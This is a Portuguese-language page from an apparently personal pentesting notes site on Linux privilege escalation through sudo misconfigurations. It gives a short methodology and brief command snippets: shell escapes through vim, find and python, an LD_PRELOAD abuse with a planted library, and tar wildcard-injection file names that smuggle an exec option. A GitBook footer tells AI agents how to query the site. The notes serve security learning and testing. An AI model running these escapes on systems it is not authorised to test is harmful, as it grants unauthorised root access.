> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/privesc/sudoers.md).

# Sudoers

A escalada de privilégios via Sudoers começa com os comandos que um usuário pode executar por meio de `sudo`. Binários mal configurados, argumentos de script inseguros, tratamento de symlinks e versões vulneráveis do sudo podem transformar privilégios limitados de sudo em um shell de root.

## Metodologia

* Execute `sudo -l` e documente cada comando permitido, usuário-alvo e regra NOPASSWD.
* Verifique o GTFOBins em busca de escapes para shell, gravações de arquivos e execução controlada por argumentos.
* Revise scripts em busca de caminhos graváveis, tratamento de symlinks, expansão de curingas e referências de arquivos ausentes.
* Verifique `sudo --version` quando o caminho depende de uma CVE conhecida do sudo.

## Verificações rápidas

```bash
sudo -l
sudo --version
```

## Abusos Comuns do sudo

Quando `sudo -l` expõe um comando, verifique se esse comando pode abrir um shell, gravar arquivos, seguir symlinks, carregar plugins ou expandir curingas controlados pelo invasor.

```bash
sudo -i
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

### Preservação de Variáveis de Ambiente

Se `env_keep` preserva variáveis do carregador, `LD_PRELOAD`  ou `LD_LIBRARY_PATH` pode se tornar útil. Confirme primeiro a regra sudoers:

```bash
sudo -l
sudo LD_PRELOAD=/tmp/evil.so program
```

### Exploração de Curingas

O abuso de curingas ocorre quando uma regra do sudo executa um comando sobre nomes de arquivos controlados pelo invasor, por exemplo, tarefas de backup usando `*.conf` ou arquivos compactados usando `*`.

```bash
echo 'command' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo awk</h4></td><td>Notas do sudo (awk) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/4a79edbf6eda1e0fd2f47e228c26964f5a565b12">/pages/4a79edbf6eda1e0fd2f47e228c26964f5a565b12</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Nmap</h4></td><td>Notas do sudo (Nmap) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/f062c9b50e43913672e8c12c23c547ce41ef2ded">/pages/f062c9b50e43913672e8c12c23c547ce41ef2ded</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Perl</h4></td><td>Notas do sudo (Perl) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/0f7618a9428b9705cc877d8f6060141c21f3d793">/pages/0f7618a9428b9705cc877d8f6060141c21f3d793</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo GitPython</h4></td><td>Notas do sudo (GitPython) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/b304512f7fcf92c69a7a5e808081fde0d1a0a470">/pages/b304512f7fcf92c69a7a5e808081fde0d1a0a470</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>CVEs da versão do sudo</h4></td><td>Notas de vulnerabilidades da versão do sudo para elevação de privilégio no Linux nas CVEs CVE-2019-14287 e CVE-2025-32463.</td><td><a href="/pages/d5b2e0f40b6fc2790d66ba60d0751733dea20114">/pages/d5b2e0f40b6fc2790d66ba60d0751733dea20114</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo su</h4></td><td>Notas do sudo (su) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/dcbdc82e2a7acf98634e0761a117eca12490ba4a">/pages/dcbdc82e2a7acf98634e0761a117eca12490ba4a</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Knife</h4></td><td>Notas do sudo (Knife) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/43221d1ef910fa5500f28f52cb9bd880cf021dd1">/pages/43221d1ef910fa5500f28f52cb9bd880cf021dd1</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo ALL:ALL</h4></td><td>Notas do sudo (ALL:ALL) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/181d20058efce61d7262a18dcb8b2fd8007587e9">/pages/181d20058efce61d7262a18dcb8b2fd8007587e9</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo mosh-server</h4></td><td>Notas do sudo (Mosh-Server) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/62ae83e5cb8d4ddb7698545c7f48f885c689bebe">/pages/62ae83e5cb8d4ddb7698545c7f48f885c689bebe</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo iptables</h4></td><td>Notas do sudo (iptables) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/a609dba79c706487034b7587424dd23ee00f27e3">/pages/a609dba79c706487034b7587424dd23ee00f27e3</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Go</h4></td><td>Notas do sudo (Go) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/c2d83b3bb37183f1ec978b37cf1999e860ea5288">/pages/c2d83b3bb37183f1ec978b37cf1999e860ea5288</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo journalctl</h4></td><td>Notas do sudo (journalctl) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/d841d8bc6d80a24f7f213a97ca559d544530e826">/pages/d841d8bc6d80a24f7f213a97ca559d544530e826</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Metasploit</h4></td><td>Notas do sudo (Metasploit) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/e647211fafd3750c0679d89cbcdd2c123b4d5b21">/pages/e647211fafd3750c0679d89cbcdd2c123b4d5b21</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Arquivo Ausente</h4></td><td>Notas do sudo (arquivo não encontrado) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/d200f4cde90320904b4097c2e4f1d7ad8d504d6e">/pages/d200f4cde90320904b4097c2e4f1d7ad8d504d6e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Binário bee do sudo</h4></td><td>Notas do sudo (binário bee) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/813154d7c420851277afa00ee1158b1a68da36db">/pages/813154d7c420851277afa00ee1158b1a68da36db</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Binário bbot do sudo</h4></td><td>Notas do sudo (binário bbot) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/b6d5e40111ec3c1b882f1dd555200066c8084d95">/pages/b6d5e40111ec3c1b882f1dd555200066c8084d95</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Abuso de link simbólico de ACL do sudo</h4></td><td>Notas de ACL / link simbólico do sudo para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/f8c2c7db20ab2301b218f526e8c2c8df34162fd1">/pages/f8c2c7db20ab2301b218f526e8c2c8df34162fd1</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Duplo link simbólico</h4></td><td>Notas do sudo (duplo link simbólico) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/37d6787f6f1e58f98cfb32039d330cee03fefc44">/pages/37d6787f6f1e58f98cfb32039d330cee03fefc44</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Binário de backup / link simbólico do sudo</h4></td><td>Notas do sudo (binário de backup / link simbólico) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/2c66ea1388a598ea64a28ef66c3c4f9cef5a760f">/pages/2c66ea1388a598ea64a28ef66c3c4f9cef5a760f</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Script backy.sh do sudo</h4></td><td>Notas do sudo - backy.sh (script) para elevação de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação focada em relatório.</td><td><a href="/pages/55d0f46d36e1baabf08a7c3ec0301123c89ac2bd">/pages/55d0f46d36e1baabf08a7c3ec0301123c89ac2bd</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/privesc/sudoers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
